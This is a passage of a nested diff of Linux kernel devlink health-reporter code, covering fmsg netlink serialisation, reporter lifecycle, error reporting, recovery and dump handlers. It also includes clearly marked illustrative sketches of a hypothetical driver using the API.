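++static int foo_diagnose(struct devlink_health_reporter *reporter,
++			struct devlink_fmsg *fmsg,
++			struct netlink_ext_ack *extack)
++{
++	static const u8 hdr[4] = { 0xde, 0xad, 0xbe, 0xef };
++	int err;
++
++	err = devlink_fmsg_u32_pair_put(fmsg, "queue_id", 3);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_string_pair_put(fmsg, "state", "stalled");
++	if (err)
++		return err;
++
++	/* Raw payloads go through the binary pair helper, which chunks the
++	 * buffer into DEVLINK_FMSG_MAX_SIZE pieces internally.
++	 */
++	return devlink_fmsg_binary_pair_put(fmsg, "descriptor", hdr,
++					    sizeof(hdr));
++}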
++
++static int
++devlink_fmsg_item_fill_type(struct devlink_fmsg_item *msg, struct sk_buff *skb)
++{
++	switch (msg->nla_type) {
++	case NLA_FLAG:
++	case NLA_U8:
++	case NLA_U32:
++	case NLA_U64:
++	case NLA_NUL_STRING:
++	case NLA_BINARY:
++		return nla_put_u8(skb, DEVLINK_ATTR_FMSG_OBJ_VALUE_TYPE,
++				  msg->nla_type);
++	default:
++		return -EINVAL;
++	}
++}
++
++static int
++devlink_fmsg_item_fill_data(struct devlink_fmsg_item *msg, struct sk_buff *skb)
++{
++	int attrtype = DEVLINK_ATTR_FMSG_OBJ_VALUE_DATA;
++	u8 tmp;
++
++	switch (msg->nla_type) {
++	case NLA_FLAG:
++		/* Always provide flag data, regardless of its value */
++		tmp = *(bool *) msg->value;
++
++		return nla_put_u8(skb, attrtype, tmp);
++	case NLA_U8:
++		return nla_put_u8(skb, attrtype, *(u8 *) msg->value);
++	case NLA_U32:
++		return nla_put_u32(skb, attrtype, *(u32 *) msg->value);
++	case NLA_U64:
++		return nla_put_u64_64bit(skb, attrtype, *(u64 *) msg->value,
++					 DEVLINK_ATTR_PAD);
++	case NLA_NUL_STRING:
++		return nla_put_string(skb, attrtype, (char *) &msg->value);
++	case NLA_BINARY:
++		return nla_put(skb, attrtype, msg->len, (void *) &msg->value);
++	default:
++		return -EINVAL;
++	}
++}
++
++static int
++devlink_fmsg_prepare_skb(struct devlink_fmsg *fmsg, struct sk_buff *skb,
++			 int *start)
++{
++	struct devlink_fmsg_item *item;
++	struct nlattr *fmsg_nlattr;
++	int i = 0;
++	int err;
++
++	fmsg_nlattr = nla_nest_start_noflag(skb, DEVLINK_ATTR_FMSG);
++	if (!fmsg_nlattr)
++		return -EMSGSIZE;
++
++	list_for_each_entry(item, &fmsg->item_list, list) {
++		if (i < *start) {
++			i++;
++			continue;
++		}
++
++		switch (item->attrtype) {
++		case DEVLINK_ATTR_FMSG_OBJ_NEST_START:
++		case DEVLINK_ATTR_FMSG_PAIR_NEST_START:
++		case DEVLINK_ATTR_FMSG_ARR_NEST_START:
++		case DEVLINK_ATTR_FMSG_NEST_END:
++			err = nla_put_flag(skb, item->attrtype);
++			break;
++		case DEVLINK_ATTR_FMSG_OBJ_VALUE_DATA:
++			err = devlink_fmsg_item_fill_type(item, skb);
++			if (err)
++				break;
++			err = devlink_fmsg_item_fill_data(item, skb);
++			break;
++		case DEVLINK_ATTR_FMSG_OBJ_NAME:
++			err = nla_put_string(skb, item->attrtype,
++					     (char *) &item->value);
++			break;
++		default:
++			err = -EINVAL;
++			break;
++		}
++		if (!err)
++			*start = ++i;
++		else
++			break;
++	}
++
++	nla_nest_end(skb, fmsg_nlattr);
++	return err;
++}
++
++static int devlink_fmsg_snd(struct devlink_fmsg *fmsg,
++			    struct genl_info *info,
++			    enum devlink_command cmd, int flags)
++{
++	struct nlmsghdr *nlh;
++	struct sk_buff *skb;
++	bool last = false;
++	int index = 0;
++	void *hdr;
++	int err;
++
++	while (!last) {
++		int tmp_index = index;
++
++		skb = genlmsg_new(GENLMSG_DEFAULT_SIZE, GFP_KERNEL);
++		if (!skb)
++			return -ENOMEM;
++
++		hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
++				  &devlink_nl_family, flags | NLM_F_MULTI, cmd);
++		if (!hdr) {
++			err = -EMSGSIZE;
++			goto nla_put_failure;
++		}
++
++		err = devlink_fmsg_prepare_skb(fmsg, skb, &index);
++		if (!err)
++			last = true;
++		else if (err != -EMSGSIZE || tmp_index == index)
++			goto nla_put_failure;
++
++		genlmsg_end(skb, hdr);
++		err = genlmsg_reply(skb, info);
++		if (err)
++			return err;
++	}
++
++	skb = genlmsg_new(GENLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!skb)
++		return -ENOMEM;
++	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
++			NLMSG_DONE, 0, flags | NLM_F_MULTI);
++	if (!nlh) {
++		err = -EMSGSIZE;
++		goto nla_put_failure;
++	}
++
++	return genlmsg_reply(skb, info);
++
++nla_put_failure:
++	nlmsg_free(skb);
++	return err;
++}
++
++static int devlink_fmsg_dumpit(struct devlink_fmsg *fmsg, struct sk_buff *skb,
++			       struct netlink_callback *cb,
++			       enum devlink_command cmd)
++{
++	int index = cb->args[0];
++	int tmp_index = index;
++	void *hdr;
++	int err;
++
++	hdr = genlmsg_put(skb, NETLINK_CB(cb->skb).portid, cb->nlh->nlmsg_seq,
++			  &devlink_nl_family, NLM_F_ACK | NLM_F_MULTI, cmd);
++	if (!hdr) {
++		err = -EMSGSIZE;
++		goto nla_put_failure;
++	}
++
++	err = devlink_fmsg_prepare_skb(fmsg, skb, &index);
++	if ((err && err != -EMSGSIZE) || tmp_index == index)
++		goto nla_put_failure;
++
++	cb->args[0] = index;
++	genlmsg_end(skb, hdr);
++	return skb->len;
++
++nla_put_failure:
++	genlmsg_cancel(skb, hdr);
++	return err;
++}
++
++struct devlink_health_reporter {
++	struct list_head list;
++	void *priv;
++	const struct devlink_health_reporter_ops *ops;
++	struct devlink *devlink;
++	struct devlink_port *devlink_port;
++	struct devlink_fmsg *dump_fmsg;
++	struct mutex dump_lock; /* lock parallel read/write from dump buffers */
++	u64 graceful_period;
++	bool auto_recover;
++	bool auto_dump;
++	u8 health_state;
++	u64 dump_ts;
++	u64 dump_real_ts;
++	u64 error_count;
++	u64 recovery_count;
++	u64 last_recovery_ts;
++	refcount_t refcount;
++};
++
++void *
++devlink_health_reporter_priv(struct devlink_health_reporter *reporter)
++{
++	return reporter->priv;
++}
++EXPORT_SYMBOL_GPL(devlink_health_reporter_priv);
++
++static struct devlink_health_reporter *
++__devlink_health_reporter_find_by_name(struct list_head *reporter_list,
++				       struct mutex *list_lock,
++				       const char *reporter_name)
++{
++	struct devlink_health_reporter *reporter;
++
++	lockdep_assert_held(list_lock);
++	list_for_each_entry(reporter, reporter_list, list)
++		if (!strcmp(reporter->ops->name, reporter_name))
++			return reporter;
++	return NULL;
++}
++
++static struct devlink_health_reporter *
++devlink_health_reporter_find_by_name(struct devlink *devlink,
++				     const char *reporter_name)
++{
++	return __devlink_health_reporter_find_by_name(&devlink->reporter_list,
++						      &devlink->reporters_lock,
++						      reporter_name);
++}
++
++static struct devlink_health_reporter *
++devlink_port_health_reporter_find_by_name(struct devlink_port *devlink_port,
++					  const char *reporter_name)
++{
++	return __devlink_health_reporter_find_by_name(&devlink_port->reporter_list,
++						      &devlink_port->reporters_lock,
++						      reporter_name);
++}
++
++static struct devlink_health_reporter *
++__devlink_health_reporter_create(struct devlink *devlink,
++				 const struct devlink_health_reporter_ops *ops,
++				 u64 graceful_period, void *priv)
++{
++	struct devlink_health_reporter *reporter;
++
++	if (WARN_ON(graceful_period && !ops->recover))
++		return ERR_PTR(-EINVAL);
++
++	reporter = kzalloc(sizeof(*reporter), GFP_KERNEL);
++	if (!reporter)
++		return ERR_PTR(-ENOMEM);
++
++	reporter->priv = priv;
++	reporter->ops = ops;
++	reporter->devlink = devlink;
++	reporter->graceful_period = graceful_period;
++	reporter->auto_recover = !!ops->recover;
++	reporter->auto_dump = !!ops->dump;
++	mutex_init(&reporter->dump_lock);
++	refcount_set(&reporter->refcount, 1);
++	return reporter;
++}
++
++/**
++ *	devlink_port_health_reporter_create - create devlink health reporter for
++ *	                                      specified port instance
++ *
++ *	@port: devlink_port which should contain the new reporter
++ *	@ops: ops
++ *	@graceful_period: to avoid recovery loops, in msecs
++ *	@priv: priv
++ */
++struct devlink_health_reporter *
++devlink_port_health_reporter_create(struct devlink_port *port,
++				    const struct devlink_health_reporter_ops *ops,
++				    u64 graceful_period, void *priv)
++{
++	struct devlink_health_reporter *reporter;
++
++	mutex_lock(&port->reporters_lock);
++	if (__devlink_health_reporter_find_by_name(&port->reporter_list,
++						   &port->reporters_lock, ops->name)) {
++		reporter = ERR_PTR(-EEXIST);
++		goto unlock;
++	}
++
++	reporter = __devlink_health_reporter_create(port->devlink, ops,
++						    graceful_period, priv);
++	if (IS_ERR(reporter))
++		goto unlock;
++
++	reporter->devlink_port = port;
++	list_add_tail(&reporter->list, &port->reporter_list);
++unlock:
++	mutex_unlock(&port->reporters_lock);
++	return reporter;
++}
++EXPORT_SYMBOL_GPL(devlink_port_health_reporter_create);
++
++/**
++ *	devlink_health_reporter_create - create devlink health reporter
++ *
++ *	@devlink: devlink
++ *	@ops: ops
++ *	@graceful_period: to avoid recovery loops, in msecs
++ *	@priv: priv
++ */
++struct devlink_health_reporter *
++devlink_health_reporter_create(struct devlink *devlink,
++			       const struct devlink_health_reporter_ops *ops,
++			       u64 graceful_period, void *priv)
++{
++	struct devlink_health_reporter *reporter;
++
++	mutex_lock(&devlink->reporters_lock);
++	if (devlink_health_reporter_find_by_name(devlink, ops->name)) {
++		reporter = ERR_PTR(-EEXIST);
++		goto unlock;
++	}
++
++	reporter = __devlink_health_reporter_create(devlink, ops,
++						    graceful_period, priv);
++	if (IS_ERR(reporter))
++		goto unlock;
++
++	list_add_tail(&reporter->list, &devlink->reporter_list);
++unlock:
++	mutex_unlock(&devlink->reporters_lock);
++	return reporter;
++}
++EXPORT_SYMBOL_GPL(devlink_health_reporter_create);
++
++static void
++devlink_health_reporter_free(struct devlink_health_reporter *reporter)
++{
++	mutex_destroy(&reporter->dump_lock);
++	if (reporter->dump_fmsg)
++		devlink_fmsg_free(reporter->dump_fmsg);
++	kfree(reporter);
++}
++
++static void
++devlink_health_reporter_put(struct devlink_health_reporter *reporter)
++{
++	if (refcount_dec_and_test(&reporter->refcount))
++		devlink_health_reporter_free(reporter);
++}
++
++static void
++__devlink_health_reporter_destroy(struct devlink_health_reporter *reporter)
++{
++	list_del(&reporter->list);
++	devlink_health_reporter_put(reporter);
++}
++
++/**
++ *	devlink_health_reporter_destroy - destroy devlink health reporter
++ *
++ *	@reporter: devlink health reporter to destroy
++ */
++void
++devlink_health_reporter_destroy(struct devlink_health_reporter *reporter)
++{
++	struct mutex *lock = &reporter->devlink->reporters_lock;
++
++	mutex_lock(lock);
++	__devlink_health_reporter_destroy(reporter);
++	mutex_unlock(lock);
++}
++EXPORT_SYMBOL_GPL(devlink_health_reporter_destroy);
++
++/**
++ *	devlink_port_health_reporter_destroy - destroy devlink port health reporter
++ *
++ *	@reporter: devlink health reporter to destroy
++ */
++void
++devlink_port_health_reporter_destroy(struct devlink_health_reporter *reporter)
++{
++	struct mutex *lock = &reporter->devlink_port->reporters_lock;
++
++	mutex_lock(lock);
++	__devlink_health_reporter_destroy(reporter);
++	mutex_unlock(lock);
++}
++EXPORT_SYMBOL_GPL(devlink_port_health_reporter_destroy);
++
++static int
++devlink_nl_health_reporter_fill(struct sk_buff *msg,
++				struct devlink_health_reporter *reporter,
++				enum devlink_command cmd, u32 portid,
++				u32 seq, int flags)
++{
++	struct devlink *devlink = reporter->devlink;
++	struct nlattr *reporter_attr;
++	void *hdr;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto genlmsg_cancel;
++
++	if (reporter->devlink_port) {
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, reporter->devlink_port->index))
++			goto genlmsg_cancel;
++	}
++	reporter_attr = nla_nest_start_noflag(msg,
++					      DEVLINK_ATTR_HEALTH_REPORTER);
++	if (!reporter_attr)
++		goto genlmsg_cancel;
++	if (nla_put_string(msg, DEVLINK_ATTR_HEALTH_REPORTER_NAME,
++			   reporter->ops->name))
++		goto reporter_nest_cancel;
++	if (nla_put_u8(msg, DEVLINK_ATTR_HEALTH_REPORTER_STATE,
++		       reporter->health_state))
++		goto reporter_nest_cancel;
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_ERR_COUNT,
++			      reporter->error_count, DEVLINK_ATTR_PAD))
++		goto reporter_nest_cancel;
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_RECOVER_COUNT,
++			      reporter->recovery_count, DEVLINK_ATTR_PAD))
++		goto reporter_nest_cancel;
++	if (reporter->ops->recover &&
++	    nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD,
++			      reporter->graceful_period,
++			      DEVLINK_ATTR_PAD))
++		goto reporter_nest_cancel;
++	if (reporter->ops->recover &&
++	    nla_put_u8(msg, DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER,
++		       reporter->auto_recover))
++		goto reporter_nest_cancel;
++	if (reporter->dump_fmsg &&
++	    nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_DUMP_TS,
++			      jiffies_to_msecs(reporter->dump_ts),
++			      DEVLINK_ATTR_PAD))
++		goto reporter_nest_cancel;
++	if (reporter->dump_fmsg &&
++	    nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_DUMP_TS_NS,
++			      reporter->dump_real_ts, DEVLINK_ATTR_PAD))
++		goto reporter_nest_cancel;
++	if (reporter->ops->dump &&
++	    nla_put_u8(msg, DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP,
++		       reporter->auto_dump))
++		goto reporter_nest_cancel;
++
++	nla_nest_end(msg, reporter_attr);
++	genlmsg_end(msg, hdr);
++	return 0;
++
++reporter_nest_cancel:
++	nla_nest_end(msg, reporter_attr);
++genlmsg_cancel:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static void devlink_recover_notify(struct devlink_health_reporter *reporter,
++				   enum devlink_command cmd)
++{
++	struct devlink *devlink = reporter->devlink;
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON(cmd != DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
++	WARN_ON(!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED));
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_health_reporter_fill(msg, reporter, cmd, 0, 0, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
++				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++void
++devlink_health_reporter_recovery_done(struct devlink_health_reporter *reporter)
++{
++	reporter->recovery_count++;
++	reporter->last_recovery_ts = jiffies;
++}
++EXPORT_SYMBOL_GPL(devlink_health_reporter_recovery_done);
++
++static int
++devlink_health_reporter_recover(struct devlink_health_reporter *reporter,
++				void *priv_ctx, struct netlink_ext_ack *extack)
++{
++	int err;
++
++	if (reporter->health_state == DEVLINK_HEALTH_REPORTER_STATE_HEALTHY)
++		return 0;
++
++	if (!reporter->ops->recover)
++		return -EOPNOTSUPP;
++
++	err = reporter->ops->recover(reporter, priv_ctx, extack);
++	if (err)
++		return err;
++
++	devlink_health_reporter_recovery_done(reporter);
++	reporter->health_state = DEVLINK_HEALTH_REPORTER_STATE_HEALTHY;
++	devlink_recover_notify(reporter, DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
++
++	return 0;
++}
++
++static void
++devlink_health_dump_clear(struct devlink_health_reporter *reporter)
++{
++	if (!reporter->dump_fmsg)
++		return;
++	devlink_fmsg_free(reporter->dump_fmsg);
++	reporter->dump_fmsg = NULL;
++}
++
++static int devlink_health_do_dump(struct devlink_health_reporter *reporter,
++				  void *priv_ctx,
++				  struct netlink_ext_ack *extack)
++{
++	int err;
++
++	if (!reporter->ops->dump)
++		return 0;
++
++	if (reporter->dump_fmsg)
++		return 0;
++
++	reporter->dump_fmsg = devlink_fmsg_alloc();
++	if (!reporter->dump_fmsg) {
++		err = -ENOMEM;
++		return err;
++	}
++
++	err = devlink_fmsg_obj_nest_start(reporter->dump_fmsg);
++	if (err)
++		goto dump_err;
++
++	err = reporter->ops->dump(reporter, reporter->dump_fmsg,
++				  priv_ctx, extack);
++	if (err)
++		goto dump_err;
++
++	err = devlink_fmsg_obj_nest_end(reporter->dump_fmsg);
++	if (err)
++		goto dump_err;
++
++	reporter->dump_ts = jiffies;
++	reporter->dump_real_ts = ktime_get_real_ns();
++
++	return 0;
++
++dump_err:
++	devlink_health_dump_clear(reporter);
++	return err;
++}
++
++int devlink_health_report(struct devlink_health_reporter *reporter,
++			  const char *msg, void *priv_ctx)
++{
++	enum devlink_health_reporter_state prev_health_state;
++	struct devlink *devlink = reporter->devlink;
++	unsigned long recover_ts_threshold;
++	int ret;
++
++	/* write a log message of the current error */
++	WARN_ON(!msg);
++	trace_devlink_health_report(devlink, reporter->ops->name, msg);
++	reporter->error_count++;
++	prev_health_state = reporter->health_state;
++	reporter->health_state = DEVLINK_HEALTH_REPORTER_STATE_ERROR;
++	devlink_recover_notify(reporter, DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
++
++	/* abort if the previous error wasn't recovered */
++	recover_ts_threshold = reporter->last_recovery_ts +
++			       msecs_to_jiffies(reporter->graceful_period);
++	if (reporter->auto_recover &&
++	    (prev_health_state != DEVLINK_HEALTH_REPORTER_STATE_HEALTHY ||
++	     (reporter->last_recovery_ts && reporter->recovery_count &&
++	      time_is_after_jiffies(recover_ts_threshold)))) {
++		trace_devlink_health_recover_aborted(devlink,
++						     reporter->ops->name,
++						     reporter->health_state,
++						     jiffies -
++						     reporter->last_recovery_ts);
++		return -ECANCELED;
++	}
++
++	reporter->health_state = DEVLINK_HEALTH_REPORTER_STATE_ERROR;
++
++	if (reporter->auto_dump) {
++		mutex_lock(&reporter->dump_lock);
++		/* store current dump of current error, for later analysis */
++		devlink_health_do_dump(reporter, priv_ctx, NULL);
++		mutex_unlock(&reporter->dump_lock);
++	}
++
++	if (!reporter->auto_recover)
++		return 0;
++
++	devl_lock(devlink);
++	ret = devlink_health_reporter_recover(reporter, priv_ctx, NULL);
++	devl_unlock(devlink);
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(devlink_health_report);
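++
++/* [Illustrative sketch, not part of this patch.] A minimal example of
++ * registering a reporter and reporting an error with it; foo_ops,
++ * foo_recover() and foo_report_queue_error() are assumptions for
++ * illustration only (foo_diagnose() is the sketch shown earlier).
++ */
++static int foo_recover(struct devlink_health_reporter *reporter,
++		       void *priv_ctx, struct netlink_ext_ack *extack)
++{
++	/* Reset the faulty queue here; returning 0 marks the reporter
++	 * healthy again and bumps recovery_count via recovery_done.
++	 */
++	return 0;
++}
++
++static const struct devlink_health_reporter_ops foo_ops = {
++	.name = "foo_queue",
++	.recover = foo_recover,
++	.diagnose = foo_diagnose,
++};
++
++static int foo_report_queue_error(struct devlink *devlink, void *ctx)
++{
++	struct devlink_health_reporter *reporter;
++
++	/* Normally done once at probe time; the 300 msec graceful period
++	 * guards against recovery loops.
++	 */
++	reporter = devlink_health_reporter_create(devlink, &foo_ops, 300,
++						  NULL);
++	if (IS_ERR(reporter))
++		return PTR_ERR(reporter);
++
++	/* With ->recover set, auto_recover defaults to true, so this will
++	 * dump (if ->dump exists) and then attempt recovery.
++	 */
++	return devlink_health_report(reporter, "TX queue stalled", ctx);
++}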
++
++static struct devlink_health_reporter *
++devlink_health_reporter_get_from_attrs(struct devlink *devlink,
++				       struct nlattr **attrs)
++{
++	struct devlink_health_reporter *reporter;
++	struct devlink_port *devlink_port;
++	char *reporter_name;
++
++	if (!attrs[DEVLINK_ATTR_HEALTH_REPORTER_NAME])
++		return NULL;
++
++	reporter_name = nla_data(attrs[DEVLINK_ATTR_HEALTH_REPORTER_NAME]);
++	devlink_port = devlink_port_get_from_attrs(devlink, attrs);
++	if (IS_ERR(devlink_port)) {
++		mutex_lock(&devlink->reporters_lock);
++		reporter = devlink_health_reporter_find_by_name(devlink, reporter_name);
++		if (reporter)
++			refcount_inc(&reporter->refcount);
++		mutex_unlock(&devlink->reporters_lock);
++	} else {
++		mutex_lock(&devlink_port->reporters_lock);
++		reporter = devlink_port_health_reporter_find_by_name(devlink_port, reporter_name);
++		if (reporter)
++			refcount_inc(&reporter->refcount);
++		mutex_unlock(&devlink_port->reporters_lock);
++	}
++
++	return reporter;
++}
++
++static struct devlink_health_reporter *
++devlink_health_reporter_get_from_info(struct devlink *devlink,
++				      struct genl_info *info)
++{
++	return devlink_health_reporter_get_from_attrs(devlink, info->attrs);
++}
++
++static struct devlink_health_reporter *
++devlink_health_reporter_get_from_cb(struct netlink_callback *cb)
++{
++	const struct genl_dumpit_info *info = genl_dumpit_info(cb);
++	struct devlink_health_reporter *reporter;
++	struct nlattr **attrs = info->attrs;
++	struct devlink *devlink;
++
++	devlink = devlink_get_from_attrs(sock_net(cb->skb->sk), attrs);
++	if (IS_ERR(devlink))
++		return NULL;
++
++	reporter = devlink_health_reporter_get_from_attrs(devlink, attrs);
++	devlink_put(devlink);
++	return reporter;
++}
++
++void
++devlink_health_reporter_state_update(struct devlink_health_reporter *reporter,
++				     enum devlink_health_reporter_state state)
++{
++	if (WARN_ON(state != DEVLINK_HEALTH_REPORTER_STATE_HEALTHY &&
++		    state != DEVLINK_HEALTH_REPORTER_STATE_ERROR))
++		return;
++
++	if (reporter->health_state == state)
++		return;
++
++	reporter->health_state = state;
++	trace_devlink_health_reporter_state_update(reporter->devlink,
++						   reporter->ops->name, state);
++	devlink_recover_notify(reporter, DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
++}
++EXPORT_SYMBOL_GPL(devlink_health_reporter_state_update);
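++
++/* [Illustrative sketch, not part of this patch.] A driver that detects an
++ * out-of-band recovery (e.g. a firmware event) can mark the reporter healthy
++ * itself; foo_fw_recovered() is an assumption for illustration only.
++ */
++static void foo_fw_recovered(struct devlink_health_reporter *reporter)
++{
++	devlink_health_reporter_recovery_done(reporter);
++	devlink_health_reporter_state_update(reporter,
++					     DEVLINK_HEALTH_REPORTER_STATE_HEALTHY);
++}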
++
++static int devlink_nl_cmd_health_reporter_get_doit(struct sk_buff *skb,
++						   struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_health_reporter *reporter;
++	struct sk_buff *msg;
++	int err;
++
++	reporter = devlink_health_reporter_get_from_info(devlink, info);
++	if (!reporter)
++		return -EINVAL;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg) {
++		err = -ENOMEM;
++		goto out;
++	}
++
++	err = devlink_nl_health_reporter_fill(msg, reporter,
++					      DEVLINK_CMD_HEALTH_REPORTER_GET,
++					      info->snd_portid, info->snd_seq,
++					      0);
++	if (err) {
++		nlmsg_free(msg);
++		goto out;
++	}
++
++	err = genlmsg_reply(msg, info);
++out:
++	devlink_health_reporter_put(reporter);
++	return err;
++}
++
++static int
++devlink_nl_cmd_health_reporter_get_dumpit(struct sk_buff *msg,
++					  struct netlink_callback *cb)
++{
++	struct devlink_health_reporter *reporter;
++	struct devlink_port *port;
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		mutex_lock(&devlink->reporters_lock);
++		list_for_each_entry(reporter, &devlink->reporter_list,
++				    list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_health_reporter_fill(
++				msg, reporter, DEVLINK_CMD_HEALTH_REPORTER_GET,
++				NETLINK_CB(cb->skb).portid, cb->nlh->nlmsg_seq,
++				NLM_F_MULTI);
++			if (err) {
++				mutex_unlock(&devlink->reporters_lock);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		mutex_unlock(&devlink->reporters_lock);
++		devlink_put(devlink);
++	}
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(port, &devlink->port_list, list) {
++			mutex_lock(&port->reporters_lock);
++			list_for_each_entry(reporter, &port->reporter_list, list) {
++				if (idx < start) {
++					idx++;
++					continue;
++				}
++				err = devlink_nl_health_reporter_fill(
++					msg, reporter,
++					DEVLINK_CMD_HEALTH_REPORTER_GET,
++					NETLINK_CB(cb->skb).portid,
++					cb->nlh->nlmsg_seq, NLM_F_MULTI);
++				if (err) {
++					mutex_unlock(&port->reporters_lock);
++					devl_unlock(devlink);
++					devlink_put(devlink);
++					goto out;
++				}
++				idx++;
++			}
++			mutex_unlock(&port->reporters_lock);
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int
++devlink_nl_cmd_health_reporter_set_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_health_reporter *reporter;
++	int err;
++
++	reporter = devlink_health_reporter_get_from_info(devlink, info);
++	if (!reporter)
++		return -EINVAL;
++
++	if (!reporter->ops->recover &&
++	    (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD] ||
++	     info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER])) {
++		err = -EOPNOTSUPP;
++		goto out;
++	}
++	if (!reporter->ops->dump &&
++	    info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP]) {
++		err = -EOPNOTSUPP;
++		goto out;
++	}
++
++	if (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD])
++		reporter->graceful_period =
++			nla_get_u64(info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD]);
++
++	if (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER])
++		reporter->auto_recover =
++			nla_get_u8(info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER]);
++
++	if (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP])
++		reporter->auto_dump =
++		nla_get_u8(info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP]);
++
++	devlink_health_reporter_put(reporter);
++	return 0;
++out:
++	devlink_health_reporter_put(reporter);
++	return err;
++}
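++
++/* [Illustrative sketch, not part of this patch.] The doit above backs
++ * "devlink health set"; a typical invocation (device and reporter names are
++ * assumptions) looks like:
++ *
++ *   devlink health set pci/0000:00:05.0 reporter foo_queue \
++ *           grace_period 300 auto_recover true
++ *
++ * Attributes the reporter's ops cannot honour (no ->recover or ->dump
++ * callback) are rejected with -EOPNOTSUPP.
++ */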
++
++static int devlink_nl_cmd_health_reporter_recover_doit(struct sk_buff *skb,
++						       struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_health_reporter *reporter;
++	int err;
++
++	reporter = devlink_health_reporter_get_from_info(devlink, info);
++	if (!reporter)
++		return -EINVAL;
++
++	err = devlink_health_reporter_recover(reporter, NULL, info->extack);
++
++	devlink_health_reporter_put(reporter);
++	return err;
++}
++
++static int devlink_nl_cmd_health_reporter_diagnose_doit(struct sk_buff *skb,
++							struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_health_reporter *reporter;
++	struct devlink_fmsg *fmsg;
++	int err;
++
++	reporter = devlink_health_reporter_get_from_info(devlink, info);
++	if (!reporter)
++		return -EINVAL;
++
++	if (!reporter->ops->diagnose) {
++		devlink_health_reporter_put(reporter);
++		return -EOPNOTSUPP;
++	}
++
++	fmsg = devlink_fmsg_alloc();
++	if (!fmsg) {
++		devlink_health_reporter_put(reporter);
++		return -ENOMEM;
++	}
++
++	err = devlink_fmsg_obj_nest_start(fmsg);
++	if (err)
++		goto out;
++
++	err = reporter->ops->diagnose(reporter, fmsg, info->extack);
++	if (err)
++		goto out;
++
++	err = devlink_fmsg_obj_nest_end(fmsg);
++	if (err)
++		goto out;
++
++	err = devlink_fmsg_snd(fmsg, info,
++			       DEVLINK_CMD_HEALTH_REPORTER_DIAGNOSE, 0);
++
++out:
++	devlink_fmsg_free(fmsg);
++	devlink_health_reporter_put(reporter);
++	return err;
++}
++
++static int
++devlink_nl_cmd_health_reporter_dump_get_dumpit(struct sk_buff *skb,
++					       struct netlink_callback *cb)
++{
++	struct devlink_health_reporter *reporter;
++	u64 start = cb->args[0];
++	int err;
++
++	reporter = devlink_health_reporter_get_from_cb(cb);
++	if (!reporter)
++		return -EINVAL;
++
++	if (!reporter->ops->dump) {
++		err = -EOPNOTSUPP;
++		goto out;
++	}
++	mutex_lock(&reporter->dump_lock);
++	if (!start) {
++		err = devlink_health_do_dump(reporter, NULL, cb->extack);
++		if (err)
++			goto unlock;
++		cb->args[1] = reporter->dump_ts;
++	}
++	if (!reporter->dump_fmsg || cb->args[1] != reporter->dump_ts) {
++		NL_SET_ERR_MSG_MOD(cb->extack, "Dump trampled, please retry");
++		err = -EAGAIN;
++		goto unlock;
++	}
++
++	err = devlink_fmsg_dumpit(reporter->dump_fmsg, skb, cb,
++				  DEVLINK_CMD_HEALTH_REPORTER_DUMP_GET);
++unlock:
++	mutex_unlock(&reporter->dump_lock);
++out:
++	devlink_health_reporter_put(reporter);
++	return err;
++}
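++
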